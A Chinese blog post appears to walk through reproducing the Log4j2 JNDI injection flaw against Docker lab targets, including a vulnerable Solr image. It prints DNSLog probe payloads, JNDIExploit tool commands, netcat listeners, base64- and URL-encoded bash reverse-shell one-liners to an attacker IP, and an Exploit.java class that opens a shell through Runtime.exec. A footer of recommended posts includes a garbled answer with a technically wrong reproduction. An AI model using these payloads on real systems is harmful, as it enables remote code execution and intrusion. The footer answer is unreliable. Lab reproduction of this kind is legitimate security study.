log4j历史漏洞复现

已于 2023-04-02 04:48:14 修改
阅读量1.2k 收藏 8
点赞数
分类专栏: 漏洞复现 文章标签: log4j 网络安全 web安全
于 2023-04-02 04:42:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/129906229
版权

apache log4j简介

Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。该工具重写了 log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组 建等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。

漏洞简介

log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目 标服务器上执行任意代码。

影响范围

组件应用:
Apache Struts2
Apache Solr
Apache Druid
Apache Flink
srping-boot-strater-log4j2

影响log4j版本:
Apache Log4j 2.0 ~ 2.15.0-rc1

漏洞复现一(LDAP)

环境搭建
docker pull vulfocus/log4j2-rce-2021-12-09 
docker run -d -ti -p 28080:8080 vulfocus/log4j2-rce-2021-12-09

1.默认页面,再点击下面的???后,看见返回ok,并且再网页上有payload的传参,可以进行测试poc。

请添加图片描述

请添加图片描述

poc测试
${jndi:ldap://82clpb.dnslog.cn}

//url编码后
%24%7Bjndi%3Aldap%3A%2F%2F82clpb.dnslog.cn%7D

1.在dnslog平台上复制一个测试网址,进行url编码,再进行插入传参部分。

请添加图片描述

2.发送后,在dnslog平台上可以看见可以请求到,说明漏洞存在。

请添加图片描述

请添加图片描述

复现过程

1.下载工具 :

https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2

2.利用这个工具搭建恶意的恶意JNDI服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip

请添加图片描述

  1. 启动监听端口接收shell
nc -lvvp 8888
  1. 构造EXP
bash -i >& /dev/tcp/192.168.42.132/8888 0>&1 
base64编码 -> url编码 
YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi84ODg4IDA%2BJjEg

请添加图片描述

请添加图片描述

5.构造反弹shell的EXP,然后转url编码。用Bp抓包,使用的是get 请求,在payload后面加上构造好的url编码的poc,重发,LDAP服务器会解析这条命令,实现反弹shell。

//payload
${jndi:ldap://192.168.42.132:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi84ODg4IDA%2BJjEg}

 //转url编码的poc
%24%7Bjndi%3Aldap%3A%2F%2F192.168.42.132%3A1389%2FTomcatBypass%2FCommand%2FBase64%2FYmFzaCAtaSA%252BJiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi84ODg4IDA%252BJjEg%7D

请添加图片描述

请添加图片描述

漏洞复现二

环境搭建

1.vim docker-compose.yml ,然后docker-compose up -d

version: '2'
services:
 solr:
   image: vulhub/solr:8.11.0
   ports:
   - "8983:8983"

请添加图片描述

请添加图片描述

POC测试
${jndi:ldap://80n1xs.dnslog.cn}
${jndi:ldap://${sys:java.version}.vebwc2.dnslog.cn}
${jndi:ldap://${sys:username}.vebwc2.dnslog.cn}

http://192.168.42.132:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.80n1xs.dnslog.cn}

请添加图片描述

请添加图片描述

复现过程

1.下载工具 :

 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

2.构造命令执行

bash -i >& /dev/tcp/192.168.42.132/9090 0>&1

java-runtime-exec转换:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}

3.使用工具进行攻击利用,然后开启监听9090端口。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "command" -A 攻击机address

请添加图片描述

4.根据工具给出来的Poc ,使用Bp抓包,和复现一那样在action后面填入构造好的Poc ,poc进行url编码。或者直接访问也行。

http://192.168.42.132:8983/solr/admin/cores?action=${jndi:rmi://192.168.42.132:1099/cyxzub}
http://192.168.42.132:8983/solr/admin/cores?action=%24%7Bjndi%3Armi%3A%2F%2F192.168.42.132%3A1099%2Fcyxzub%7D

请添加图片描述

请添加图片描述

5.重发后,在9090端口会成功得到shell。

请添加图片描述

漏洞复现三

复现过程

1.和之前的fastjson复现一样,使用jndi注入+rmi 。先创建一个Exploit.java的恶意文件,利用脚本开启的jndi服务请求到攻击机上的Exploit.class 文件,从而执行类文件中反弹shell的命令。

// Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
        public Exploit(){
                try{
                        Runtime.getRuntime().exec("/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}");
                }catch(Exception e){
                        e.printStackTrace();
                }
        }
        public static void main(String[] argv){
                Exploit e = new Exploit();
        }
}

2.生成类文件.class ,使用 javac Exploit.java ,然后在当前目录开启python的web服务。

javac Exploit.java
python3 -m http.server

请添加图片描述

3.使用脚本开启jndi服务,同时nc监听反弹shell的端口。请添加图片描述

4.使用Bp抓包,把payload进行url编码,发送得到shell。

${jndi:ldap://192.168.42.132:9999/Exploit}
url编码  ↓ 
%24%7Bjndi%3Aldap%3A%2F%2F192.168.42.132%3A9999%2FExploit%7D

请添加图片描述

请添加图片描述

00zzz
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3733
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
log4j漏洞复现
zhy的博客
12-23 2570
第一步,下载marshalsec 源码进行编译 https://github.com/mbechler/marshalsec 下载后进行编译打包 mvn clean package -DskipTests 得到jar文件 在这里插入图片描述
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7816
log4j漏洞原理和靶场复现
推荐开源项目:JNDI-Exploit-Bypass-Demo —— 深入理解与绕过JNDI操纵限制的实战示例
最新发布
gitblog_00017的博客
05-26 395
推荐开源项目:JNDI-Exploit-Bypass-Demo —— 深入理解与绕过JNDI操纵限制的实战示例 项目地址:https://gitcode.com/kxcode/JNDI-Exploit-Bypass-Demo 在Java世界中,JNDI(Java Naming and Directory Interface)是一种强大的工具,用于查找和绑定分布式环境中的对象。然而,不恰当的使用可能...
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
log4j2漏洞复现
qq_17622203的博客
03-21 3248
参考链接 Apache Log4j2 远程代码执行漏洞 - xuzhujack - 博客园 CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_网络¥安全联盟站的博客-CSDN博客 工具链接 DNSLog Platform https://github.com/welk1n/JNDI-Injection-Exploit/releases https://www.jackson-t.ca/runtime-exec-payloads.html 此次漏洞的出现,正是由用于
log4j2.17.2
04-14
log4j2.17.2漏洞修复程序包详解》 在信息技术领域,日志管理是系统维护和故障排查的重要环节。Log4j作为Java平台广泛使用的日志记录框架,其性能高效、功能强大,深受开发者的青睐。然而,随着技术的发展,安全...
LOG4J RCE 漏洞分享与自查.pdf
12-15
本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞。Lookup 模块允许用户在日志格式字符串中插入变量,从而...
Log4j漏洞复现
m1287578441的博客
06-08 2936
Log4j漏洞复现
网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 2011
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 1861
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
apache log4j2 漏洞复现
06-28
### 回答1: Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,需要尽快修复。建议管理员及时更新受影响的软件版本,以保护服务器安全。 ### 回答2: 近日,全球多个国家的安全研究员纷纷发现一个Apache log4j2漏洞,该漏洞编号为CVE-2021-44228,危害严重。攻击者利用该漏洞可以远程执行恶意代码,入侵服务器、系统和网络,导致极大的信息泄露和系统瘫痪风险。本文将介绍如何在实验环境中进行漏洞复现。 1.环境准备 本次复现可以采用一个简单的demo工程,也可以用一些现有的著名开源项目(如Spring、Kafka)进行复现。这里以demo工程为例。 - 操作系统:Ubuntu 18.04.5 LTS - Java环境:JDK 1.8 - 工程环境:IntelliJ IDEA + Maven 2.漏洞安装 使用Maven构建demo工程,然后在pom.xml文件中加入log4j2依赖,可以使用找公用库的方式如下: ``` <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.16.0</version> </dependency> ``` 其中 version 指定在 这一足以管理员权势时 Apache 官方才刚刚修复的漏洞小版本。 3.漏洞验证 编写一个包含漏洞的代码,如下: ``` package cn.xfakir.demo; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class Demo { private static final Logger logger = LogManager.getLogger(Demo.class); public static void main(String[] args) { String payload = "${java.lang.Runtime.getRuntime().exec('calc.exe')}"; logger.info(payload); } } ``` 该代码使用log4j2记录日志的方式,使用 ${} 语法引用payload变量的值,当payload变量的值包含恶意命令时,该漏洞即可成功利用,这里设为calc.exe运行计算器程序。 4.利用漏洞 构建好工程之后,启动demo,如果demo的启动方式是直接运行jar包,可以使用以下命令启动: ``` java -jar Demo-1.0-SNAPSHOT.jar ``` 在控制台看到 INFO 模式下的 ${java.lang.Runtime.getRuntime().exec('calc.exe')} 日志输出,则漏洞被成功利用。 5.修复漏洞 Apache官方已经发布了漏洞修复的版本,建议使用最新版本或对应的补丁,详见官方发布的修复安全公告。除此之外,也可以临时关闭log4j2的服务,防止被攻击。 以上是本文关于apache log4j2漏洞复现的介绍,漏洞的修复和预防对于互联网安全至关重要,希望大家及时更新代码和环境,确保系统网络的安全。 ### 回答3: Apache log4j2是一种流行的Java日志框架,它可以通过配置和代码记录日志。但是,最近发现了一个名为CVE-2021-44228的漏洞,攻击者可以利用该漏洞log4j2中执行任意代码,这是一种非常危险的攻击。 要复现这个漏洞,我们需要遵循以下步骤: 步骤1:下载log4j2的jar文件。可以从log4j官方网站或maven仓库上下载。 步骤2:使用PayloadsAllTheThings项目中提供的一些有效负载对log4j2进行测试。这些有效负载在此处提供https://github.com/cyberheartmi9/CVE-2021-44228。 步骤3:将有效负载复制到代码中。 步骤4:编写一个Java应用程序,用于建立与log4j2之间的连接,并执行有效负载。建议使用MinimalLocking.java,这个java应用程序将在本地服务器上启动log4j2。 步骤5:编译和运行您的Java应用程序。 步骤6:通过TCP端口和JMX控制台,发送构造的payload来攻击log4j2。 在实际操作中,攻击者可能会使用更高级的方法,例如尝试使用日志记录的数据来执行代码。例如,在Java虚拟机中注入Java类,然后在日志输出中使用类的实例。这种方法可能需要攻击者具备更深层次的Java知识。 为了保证系统的安全,建议及时升级log4j2到最新版本,并关注官方通告以了解有关漏洞的最新信息。同时,对于企业用户,建议强化安全性措施,对服务器进行监控和维护,以便及时发现和应对安全漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值